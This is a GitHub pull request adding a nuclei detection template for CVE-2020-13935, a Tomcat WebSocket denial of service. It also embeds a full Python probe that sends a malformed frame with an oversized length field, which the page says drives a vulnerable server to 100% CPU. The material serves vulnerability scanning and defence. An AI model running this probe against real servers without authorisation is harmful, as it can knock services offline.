
Add CVE-2020-13935.yaml Template - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service #11164

Merged
merged 2 commits into from
Dec 13, 2024

Conversation

sttlr
Contributor

@sttlr sttlr commented Nov 7, 2024

Template / PR Information

Wrote template for CVE-2020-13935 - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service

Checks:

  • If the Tomcat WebSocket echo example page exists
  • If the WebSocket echo example works
  • If there is a read timeout after sending the malformed WebSocket message (target is vulnerable)
  • If no protocol error is received (otherwise the target is not vulnerable)

References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Spin up vulnerable Tomcat:

docker run --rm -it -p 8080:8080 --platform linux/amd64 --name tomcat_vulnerable --cpus 1 tomcat:8.0.51-jre8-slim

Check CPU usage - practically zero:


Run the template:

go run /Users/sttlr/tools/nuclei-dev/cmd/nuclei/main.go -code -itags dos -t /Users/sttlr/sttlr-nuclei-templates/CVE-2020-13935.yaml -u http://127.0.0.1:8080/ -v

Check CPU usage - 100%:

Additional Details (leave it blank if not applicable)

Run on dev nuclei, because code templates with engine set to go don't work on the latest nuclei version v3.3.5; see projectdiscovery/nuclei#5759.

github.com/gorilla/websocket@v1.4.2 needs to be installed for the exploit to run; the template tries to install it in the first code block.

/claim #11019

Additional References:
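The four checks listed in the PR description boil down to one raw WebSocket exchange: handshake with the echo endpoint, confirm a well-formed frame is echoed, then send a frame whose 64-bit payload length has its most significant bit set (RFC 6455 says that bit MUST be 0; unpatched Tomcat read the field as a signed Java long and spun on the negative length) and classify the server's reaction. The Python below is an added illustration of that exchange written for this page; it is not the nuclei template from the PR nor Tomcat/projectdiscovery code. The endpoint path `/examples/websocket/echoProgrammatic` and the `probe`/`classify` helper names are assumptions, and `probe()` needs a live target, so the frame builder, the two length decoders and the verdict logic are what can be exercised offline.

```python
import base64
import hashlib
import os
import socket
import struct

OP_TEXT = 0x1
OP_CLOSE = 0x8


def build_text_frame(payload_len, payload=b"", mask=True):
    """Build one FIN text frame as a client sends it (RFC 6455 5.2).

    payload_len is written into the header exactly as given, so a value
    with bit 63 set (>= 2**63) yields the malformed frame behind
    CVE-2020-13935: the RFC requires the MSB of the 64-bit length to be 0.
    """
    frame = bytes([0x80 | OP_TEXT])            # FIN=1, RSV=0, opcode=text
    mask_bit = 0x80 if mask else 0
    if payload_len <= 125:
        frame += bytes([mask_bit | payload_len])
    elif payload_len <= 0xFFFF:
        frame += bytes([mask_bit | 126]) + struct.pack(">H", payload_len)
    else:
        frame += bytes([mask_bit | 127]) + struct.pack(">Q", payload_len)
    if not mask:
        return frame + payload
    key = os.urandom(4)                         # client frames must be masked
    return frame + key + bytes(b ^ key[i % 4] for i, b in enumerate(payload))


def declared_payload_length(frame, as_java_long=False):
    """Decode the payload length a frame header declares.

    as_java_long=True mimics the unpatched server: the 8-byte field is read
    as a signed 64-bit integer with no range check, so it comes back
    negative.  The default enforces the RFC rule and raises ValueError.
    """
    if len(frame) < 2:
        raise ValueError("truncated frame header")
    base = frame[1] & 0x7F
    if base < 126:
        return base
    if base == 126:
        return struct.unpack(">H", frame[2:4])[0]
    length = struct.unpack(">q" if as_java_long else ">Q", frame[2:10])[0]
    if not as_java_long and length >> 63:
        raise ValueError("64-bit payload length has MSB set (RFC 6455 5.2)")
    return length


def classify(reply):
    """Turn what came back after the malformed frame into a verdict.

    None means recv() timed out: the server is stuck in its frame loop,
    the vulnerable behaviour the template looks for.  A close frame
    (opcode 8, typically status 1002 protocol error) means the length was
    validated and rejected.
    """
    if reply is None:
        return "vulnerable"
    if reply and (reply[0] & 0x0F) == OP_CLOSE:
        return "patched"
    return "inconclusive"


def probe(host, port, path="/examples/websocket/echoProgrammatic", timeout=5.0):
    """Raw handshake with the echo endpoint (assumed path), echo sanity
    check, then the malformed frame.  Requires a reachable target."""
    key = base64.b64encode(os.urandom(16)).decode()
    accept = base64.b64encode(hashlib.sha1(
        (key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11").encode()).digest()).decode()
    request = (f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
               "Upgrade: websocket\r\nConnection: Upgrade\r\n"
               f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode())
        response = b""
        while b"\r\n\r\n" not in response:
            chunk = sock.recv(4096)
            if not chunk:
                return "handshake failed"
            response += chunk
        status_line = response.split(b"\r\n", 1)[0]
        if b" 101 " not in status_line or accept.encode() not in response:
            return "handshake failed"
        sock.sendall(build_text_frame(5, b"probe"))    # check 2: echo works
        if sock.recv(64) != b"\x81\x05probe":          # server frames are unmasked
            return "echo example not working"
        sock.sendall(build_text_frame(1 << 63))        # length 0x8000000000000000
        try:
            reply = sock.recv(64)
        except socket.timeout:
            reply = None                               # check 3: read timeout
    return classify(reply)


if __name__ == "__main__":
    print(probe("127.0.0.1", 8080))
```

Run it against the docker container from the PR and watch the container's CPU the same way the author did; a patched Tomcat answers the oversized-length frame with a close frame almost immediately, while the vulnerable 8.0.51 image never answers and pins the core.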


algora-pbc bot commented Nov 7, 2024

👉 To complete your submission, sign up on Algora, link your Github account and submit the data for your PR.
💵 To receive payouts, sign up on Algora, link your Github account and connect with Stripe.

@GeorginaReeder

Thanks so much for your contribution @sttlr ! :)

@princechaddha princechaddha merged commit 82321a9 into projectdiscovery:main Dec 13, 2024
3 checks passed
@princechaddha princechaddha added the Done Ready to merge label Dec 13, 2024